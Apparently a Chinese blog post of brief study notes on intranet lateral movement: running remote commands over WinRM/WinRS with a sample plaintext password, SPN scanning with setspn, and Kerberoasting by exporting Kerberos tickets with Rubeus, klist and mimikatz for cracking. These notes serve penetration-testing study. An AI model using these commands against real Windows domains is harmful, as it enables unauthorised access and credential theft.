当前位置: 首页 > news >正文

内网安全-横向移动Kerberos 攻击SPN 扫描WinRMWinRSRDP

news 来源:原创 2025/5/19 15:22:02

1.WinRM&WinRS

条件:

双方开启winrm winrs服务

2008版本以上默认开启,win 7默认关闭

检测使用cs内置端口扫描5985开放情况

进行连接

winrs -r:http://192.168.93.30:5985 -u:administrator -p:Whoami2021 whoami

2.内网-spn

shell setspn -T god.org -q */*

探测主机

rc4可以被逆向aes256不可

3.kerbercast攻击条件:

使用rc4进行加密类型票据,工具Rubeus检测或者看加密类型

1.扫描:

shell setspn -T god.org -q */*

2.使用工具检测

Rubeus kerbercast

3.使用手工进行判断请求

使用klist查看

使用mimkaz进行导出和查看

导出

kerberos::list /export

使用脚本进行破解

相关文章:

  • C++ std::bitset
  • 【MyDB】5-索引管理之4-单元测试
  • 详解string类+迭代器
  • 【万字总结】前端全方位性能优化指南(二)——AVIF/WebP格式转换、渐进式加载、WASM解码加速
  • 【存储中间件】Redis核心技术与实战(四):Redis高并发高可用(Redis集群介绍与搭建)
  • TDengine 元数据
  • 从零开始实现 C++ TinyWebServer 异步日志系统 Log类详解
  • MySQL数据库入门到大蛇尚硅谷宋红康老师笔记 高级篇 part10
  • LIMS系统在纸制品制造的应用 内检实验室LIMS系统提升纸制品质控
  • JavaScript 数组方法大全:从基础到高级
  • IO(Input/Output)
  • GStreamer —— 3.1、Qt+GStreamer制作多功能播放器,支持本地mp4文件、rtsp流、usb摄像头等(可跨平台,附源码)
  • 新增菜品-02.代码开发2
  • 【后端】【Djagno】【ORM】models.ManyToManyField 多对多字段类型全解
  • 【设计模式】策略模式
  • EasyExcel--导入和导出Excel的方法
  • 面向机器人领域 | AKM Delta-Sigma数字输出无磁芯电流传感器
  • turnjs图册翻书效果
  • 数据仓库是什么,跟数据集成有什么关系
  • Web3 时代数据保护的关键挑战与应对策略
  • 俄乌直接谈判勉强收场,特朗普再次“电话外交”能否有用?|907编辑部
  • 俄外长与美国务卿通电话,讨论俄美接触等问题
  • 当“小铁人”遇上青浦,看00后如何玩转长三角铁三
  • 阳光保险拟设立私募证券投资基金,总规模200亿元
  • 布局50多个国家和地区,我国科技型企业孵化器数量全球第一
  • 山东市监局回应“盒马一批次‘无抗’鸡蛋抽检不合格后复检合格”:系生产商自行送检